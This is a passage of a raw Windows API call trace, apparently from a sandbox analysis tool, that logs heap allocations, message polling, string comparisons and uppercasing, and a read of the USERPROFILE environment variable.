HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0150.971] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0150.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77c38 [0150.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0150.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SROlf 2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ROlf 2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Olf 2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lf 2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f 2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5m.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69760 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.972] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0150.972] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0150.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0150.973] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0150.973] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0150.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0150.974] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0150.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0150.975] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0150.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0150.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0150.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0150.976] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0150.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0150.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0150.977] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0150.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.977] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0150.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.978] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.978] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.979] RtlAllocateHeap 